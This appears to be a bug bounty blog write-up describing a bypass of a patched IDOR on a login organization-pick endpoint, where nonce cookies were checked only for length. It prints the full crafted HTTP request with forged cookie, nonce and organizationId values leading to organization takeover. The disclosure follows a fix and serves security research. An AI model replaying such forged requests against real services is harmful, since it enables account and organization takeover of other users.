After my previous IDOR report team pushed the fix and closed report as resolved. Always after the fix is pushed for my reported issues, I always wanted to see if there is any bypass or at least understand how the fix has been implemented by the team.

I was checking the endpoint and this time the exploitation is even worst as compared to the earlier reported issue. "An attacker can takeover the organization of any user on the platform — without even needing the victim's session."

As a quick recap, the vulnerable request looked like this:

POST /internal/system/v1/auth/login/pick HTTP/2  
Host: us.api.prod.example.com

In the previous report, server checked organizationId and email address from the cookies and if we swap those with victim's email address and organizationId we can get the session token of the victim user.

After the fix, few thing were changed first in the cookie for the parameter example_orgpick_email_prod UUID (We can get this from the publicly published apps) is being passed of the user instead of email address. Different parameters like example_orgpick_nonce_prod was introduced and there was some validation with the XSRF token as well. After that I started playing with this values.

The modified request looks like this,

POST /internal/system/v1/auth/login/pick HTTP/2
Host: us.api.prod.example.com
Cookie: example_orgpick_email_prod=3fe7b0f0-b976-468e-a4e3-1e0855564010; example_orgpick_nonce_prod=1917137440;  ruist_client_nonce_prod=1917137440;  ruist_nonce_prod=1917137441
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Xsrf-Token: 7972cde779452320475599r097d43cacfad30bf4b52908da29ecb6d8f10a588
Origin: https://console.example.com
Content-Length: 57
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-Gpc: 1
Te: trailers

{"organizationId":"b67342ec-6382-441d-8a35-cada6f85a4d7"}

After playing with this values, I got to know that there is only length validation on the parameters not value so you can pass anything there just of the same length and you can bypass the fix that has been implemented by the team and was able to make this work. This is leading to Organization Takeover.

None
The program fixed this and paid nice bounty and bonus.

Hope so you have enjoyed this :)

Many Thanks

xploiterr